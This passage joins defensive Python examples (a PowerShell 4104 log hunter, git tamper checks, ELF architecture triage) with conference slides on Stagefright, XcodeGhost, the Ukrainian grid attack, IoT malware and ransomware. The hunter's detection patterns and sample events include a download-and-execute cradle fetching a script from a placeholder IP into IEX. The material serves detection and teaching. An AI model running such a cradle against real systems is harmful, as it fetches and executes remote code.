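from typing import Dict, List

# One 4104 record as a collector would flatten it from Get-WinEvent; the event
# properties are MessageNumber, MessageTotal, ScriptBlockText and ScriptBlockId.
Event = Dict[str, object]

# Indicators typical of PowerShell post-exploitation tooling. A constructed
# starting point for tuning in your own environment, not a complete rule set.
SUSPICIOUS = {
    "base64-decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "download-cradle": re.compile(r"DownloadString|DownloadFile", re.IGNORECASE),
    "invoke-expression": re.compile(r"Invoke-Expression|\bIEX\b", re.IGNORECASE),
    "encoded-command": re.compile(r"-EncodedCommand|-enc\b", re.IGNORECASE),
    "reflective-load": re.compile(r"Reflection\.Assembly", re.IGNORECASE),
}


def reassemble(events: List[Event]) -> Dict[str, str]:
    """Join 4104 fragments by ScriptBlockId in MessageNumber order.

    Fragments need not arrive in order. A partially logged block is still
    returned so whatever fragments exist can be hunted.
    """
    chunks: Dict[str, Dict[int, str]] = defaultdict(dict)
    for ev in events:
        if ev["Id"] != 4104:  # skip 4103 (module logging) and anything else
            continue
        chunks[str(ev["ScriptBlockId"])][int(ev["MessageNumber"])] = str(ev["ScriptBlockText"])
    return {sbid: "".join(parts[n] for n in sorted(parts)) for sbid, parts in chunks.items()}


def hunt(events: List[Event]) -> Dict[str, List[str]]:
    """Return {ScriptBlockId: [indicator names]} for every reassembled block that matches."""
    hits: Dict[str, List[str]] = {}
    for sbid, text in reassemble(events).items():
        matched = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
        if matched:
            hits[sbid] = matched
    return hits


# Constructed sample events (not real log data): a benign one-fragment block,
# a two-fragment block logged out of order whose 'DownloadString' keyword
# straddles the fragment boundary, and a 4103 event that must be ignored.
SAMPLE_EVENTS: List[Event] = [
    {"Id": 4104, "ScriptBlockId": "aaaa-0001", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Service | Where-Object Status -eq Running\n"},
    {"Id": 4104, "ScriptBlockId": "bbbb-0002", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "String('http://203.0.113.5/stage.ps1') | IEX\n"},
    {"Id": 4104, "ScriptBlockId": "bbbb-0002", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "(New-Object Net.WebClient).Download"},
    {"Id": 4103, "ScriptBlockId": "cccc-0003", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "CommandInvocation(Write-Output)"},
]

if __name__ == "__main__":
    # Only the reassembled block exposes the download cradle; no single
    # fragment contains the string 'DownloadString' on its own.
    print(hunt(SAMPLE_EVENTS))
```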
8. #RSAC
Stagefright as a Portent of Mobile Vulns
Stagefright: A series of significant vulnerabilities discovered in Android, all associated with a library that plays multi-media content
Discovered by Joshua Drake at Zimperium through exhaustive fuzzing, and then detailed analysis of fuzzing results
Code execution via text messaging, video viewing in email, browser video watching, and more
Google patched it quickly…
... But there’s a problem: For Android devices, the OEMs and Mobile Operators (carriers) sit between the code developer(s) and customers
Getting patches out in a timely fashion is difficult at best
9. #RSAC
Stagefright-Style Vuln Defenses
Upgrade to newer versions of Android (and don’t forget iOS!)
Implement a corporate strategy for doing so regularly
Via MDM and network infrastructure, enforce use of only up-to-date versions of mobile operating systems for enterprise apps and data… Deny others
Give preferential treatment to Android vendors who push updates all the way to devices quickly
[Diagram: the Android patch path. Flaw disclosure reaches Google as code owner; the notice and fix then pass through the OEMs (Samsung, LG, Moto) and the mobile operators (MO 1, MO 2, MO 3), each adding 3rd party software, before reaching Android phones A through D]
Both handset manufacturers and mobile operators lack significant financial reward for continued support of already-sold Android devices
10. #RSAC
XcodeGhost – Can You Trust Your Apps?
Historically, attacks against source code and dev tools have proven deeply insidious
Bad guys can no longer ignore iOS as a malware target
With XcodeGhost, they showed innovative ways to undermine iOS
Enterprise app store signing is another
Timeline:
1984: Reflections on Trusting Trust – backdoor the compiler
2004-2010: tcpdump, Linux kernel attempt, etc. – backdoor the source code
2015: XcodeGhost – backdoor the dev environment
11. #RSAC
XcodeGhost – Implications for Defense
Analyze the security of permitted apps in your environment
Josh Wright’s App report card at http://pen-testing.sans.org/u/64u
Data isolation from mobile devices
Container-based security is waning
Virtualized Mobile Infrastructure is rising
User training can help – don’t install untrusted apps… and tell them why
Look for anomalous activity in the environment
New free RITA (Real Intelligence Threat Analysis) tool from Black Hills Information Security
http://bit.ly/BHIS_RITA
12. #RSAC
Michael Assante
-- Director of SANS ICS Training Programs
-- Was VP and CISO of NERC
-- Directed INL’s Electric Power Program
-- Testified before US House and Senate
13. #RSAC
Lights Out
One of a handful of acknowledged ICS attacks with physical effects
Cyber attacks against 3 Ukrainian power companies on Dec 23
Successfully caused power outages
Coordinated & multi-faceted
Destructive acts
BlackEnergy 3 malware plays some role
Additional malware (e.g. customized KillDisk)
14. #RSAC
Power System SCADA 101
[Diagram: a Distribution Control Center connected to two 110 kV substations and a 35 kV substation]
16. #RSAC
The Attacks
Malware is simply a tool used for specific actions (e.g. access)
Cyber Attack 1 (ICS Kill Chain), against the Distribution Control Center:
1. Intrusion (Foothold)
2. Take over credentials & IT
3. Access & remove relevant data
4. Cross-over into SCADA
5. Change the state of power system
6. Damage firmware
7. Wipe SCADA & infrastructure hosts
Cyber Attack 2 (Supporting):
1. Flood Customer Phone Line
2. UPS take over & disconnect
19. #RSAC
Dr. Johannes Ullrich
-- Dean of Research at STI: SANS’ Graduate School
-- Director of the Internet Storm Center
20. #RSAC
Software Security: Components Matter
Insecure third party components matter!
Development environments, software components (libraries) are more and more under attack
Developer workstations are high on the target list
21. #RSAC
Apple XcodeGhost
Compromised version of Xcode offered for download on Chinese sites
Compiled software included malicious functionality
Unnoticed due to trust relationship between Apple and developers
23. #RSAC
Mitigation
Accountability: Who did it? Version control systems need to keep a record of which changes were done by whom and why
Software repositories need regular offline backups
Traditional code reviews and pentesting will not fix this
Cryptographic protection against tampering
git blame login.html
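An added example (not the talk's own material) of what the slide's "cryptographic protection against tampering" rests on: every git object id is a SHA-1 digest over its content, a commit names its tree and parent, and a tree names its blobs, so one signed commit or tag id pins every byte beneath it, and the same objects answer the "who did it?" question that `git blame login.html` asks. Git's object hashing is re-implemented here in Python so it runs without a repository; the authors, file contents and timestamp are constructed.

```python
import hashlib
from typing import Dict, List, Optional, Tuple


def git_hash(obj_type: str, payload: bytes) -> str:
    """The id `git hash-object` prints: SHA-1 over "<type> <size>\\0" + payload."""
    header = f"{obj_type} {len(payload)}\0".encode()
    return hashlib.sha1(header + payload).hexdigest()


def tree_hash(files: Dict[str, bytes]) -> str:
    """Hash a flat tree of regular files (mode 100644); git sorts entries by
    name and stores each blob id as 20 raw bytes."""
    entries = b"".join(
        b"100644 " + name.encode() + b"\0" + bytes.fromhex(git_hash("blob", files[name]))
        for name in sorted(files)
    )
    return git_hash("tree", entries)


def commit_hash(tree: str, parent: Optional[str], author: str, message: str) -> str:
    """Hash a commit object. A fixed timestamp keeps the ids reproducible."""
    stamp = "1451606400 +0000"
    lines = [f"tree {tree}"] + ([f"parent {parent}"] if parent else [])
    lines += [f"author {author} {stamp}", f"committer {author} {stamp}"]
    return git_hash("commit", ("\n".join(lines) + f"\n\n{message}\n").encode())


def verify_commit(recorded: str, files: Dict[str, bytes], parent: Optional[str],
                  author: str, message: str) -> bool:
    """Recompute the commit id from checked-out content. Editing any file changes
    its blob id, hence the tree id, hence the commit id, so a signature made over
    `recorded` (a signed commit or tag) no longer covers the altered content."""
    return commit_hash(tree_hash(files), parent, author, message) == recorded


History = List[Tuple[str, str, Dict[str, bytes]]]  # (commit id, author, files), oldest first


def blame(history: History, path: str) -> List[Tuple[str, str]]:
    """Naive `git blame`: attribute each line of the newest version of `path`
    to the author of the earliest commit whose version contains that line."""
    result = []
    for line in history[-1][2][path].splitlines():
        author = next(a for _, a, files in history if line in files.get(path, b"").splitlines())
        result.append((author, line.decode()))
    return result


# Constructed history: Alice adds login.html, then Bob inserts a field into it.
ALICE, BOB = "Alice <alice@example.com>", "Bob <bob@example.com>"
V1 = {"login.html": b"<form action='/login'>\n</form>\n"}
V2 = {"login.html": b"<form action='/login'>\n<input name='user'>\n</form>\n"}
C1 = commit_hash(tree_hash(V1), None, ALICE, "add login form")
C2 = commit_hash(tree_hash(V2), C1, BOB, "add username field")
HISTORY: History = [(C1, ALICE, V1), (C2, BOB, V2)]

if __name__ == "__main__":
    for who, text in blame(HISTORY, "login.html"):
        print(f"{who:28} {text}")
    tampered = {"login.html": V2["login.html"] + b"<!-- edited outside git -->\n"}
    print("HEAD verifies:", verify_commit(C2, V2, C1, BOB, "add username field"))
    print("after tampering:", verify_commit(C2, tampered, C1, BOB, "add username field"))
```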
24. #RSAC
The Internet of Evil Things
The IoT is not just a “target” for its own sake
More and more IoT devices are used as attack platforms after they are compromised
26. #RSAC
Multi Architecture Malware
81896 Jan 1 00:10 10 <- ELF LSB MIPS
82096 Jan 1 00:10 11 <- ELF MSB MIPS
70612 Jan 1 00:10 13 <- ELF LSB x86-64
48996 Jan 1 00:10 14 <- ELF LSB ARM
65960 Jan 1 00:10 15 <- ELF LSB 386
70648 Jan 1 00:10 16 <- ELF LSB PowerPC
65492 Jan 1 00:10 17 <- ELF LSB 386
2133 Jan 1 00:20 bin2.sh
27. #RSAC
Brute Force Architecture Detection
All versions are downloaded and execution is attempted for all of them.
Initial infection usually implements a simple bot (IRC/HTTP as C2)
Additional components are downloaded later for specific architectures
“busybox” replaced with trojaned version
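The listing above is the kind of `file`-style triage an analyst does on a drop set like this one. As an added example (not from the talk), this Python reads only the ELF identification bytes and e_machine to classify each file and to tell which of the variants would actually execute on a given host; the headers and file names are constructed, not real samples.

```python
import struct
from typing import Dict, List, Optional

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF specification for the architectures in the listing
MACHINES: Dict[int, str] = {3: "386", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def classify_elf(data: bytes) -> Optional[str]:
    """Return 'ELF <bits> <LSB|MSB> <machine>' from the first 20 bytes, or None
    if the data is not an ELF file. e_machine is a 16-bit field at offset 18
    stored in the file's own byte order, so EI_DATA must be read first."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None  # malformed identification; treat like a non-ELF file
    order = "<" if ei_data == 1 else ">"
    (e_machine,) = struct.unpack_from(order + "H", data, 18)
    bits = "32-bit" if ei_class == 1 else "64-bit"
    name = MACHINES.get(e_machine, f"unknown-machine-{e_machine}")
    return f"ELF {bits} {'LSB' if ei_data == 1 else 'MSB'} {name}"


def runnable_on(files: Dict[str, bytes], host: str) -> List[str]:
    """Names of the dropped files whose class, byte order and machine equal the
    host's signature; the others would fail to exec and are just noise."""
    return sorted(name for name, blob in files.items() if classify_elf(blob) == host)


def make_header(ei_class: int, ei_data: int, e_machine: int) -> bytes:
    """Constructed minimal ELF prefix (e_ident, e_type=ET_EXEC, e_machine) used
    as sample input here; no real binaries are involved."""
    order = "<" if ei_data == 1 else ">"
    ident = ELF_MAGIC + bytes([ei_class, ei_data, 1]) + bytes(9)  # EI_VERSION=1, padding
    return ident + struct.pack(order + "HH", 2, e_machine)


# Constructed drop set mirroring the listing on the slide: one binary per
# architecture plus a stand-in for the shell script that drives them.
DROPPED: Dict[str, bytes] = {
    "10": make_header(1, 1, 8),    # ELF 32-bit LSB MIPS
    "11": make_header(1, 2, 8),    # ELF 32-bit MSB MIPS
    "13": make_header(2, 1, 62),   # ELF 64-bit LSB x86-64
    "14": make_header(1, 1, 40),   # ELF 32-bit LSB ARM
    "15": make_header(1, 1, 3),    # ELF 32-bit LSB 386
    "16": make_header(1, 1, 20),   # ELF 32-bit LSB PowerPC
    "bin2.sh": b"#!/bin/sh\n# constructed placeholder for the dropper script\n",
}

if __name__ == "__main__":
    for name, blob in DROPPED.items():
        print(f"{name:8} {classify_elf(blob) or 'not an ELF file'}")
    print("would run on a little-endian MIPS host:", runnable_on(DROPPED, "ELF 32-bit LSB MIPS"))
```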
28. #RSAC
Change in Malware Economics
170 Million Credit Card Holders vs 61 Million Stolen (2014)
450 Million issued SSNs vs 22 Million Stolen (just OPM hack)
142 Million registered voters vs. 191 Million records leaked
ALL DATA HAS BEEN STOLEN
Little value in stealing the same data over and over.
Reducing scarcity = Reduced Price
29. #RSAC
Ransomware
Instead of copying data: Encrypt it
Ransomware has been going on for a couple of years now
Increasing in sophistication (e.g. platform independent Ransom32)
Instead of stealing data from a web site: Shut it down
Used to be more against fringe (e.g. online gambling) sites
Or for political motives
Now used against any site with insufficient DDoS protection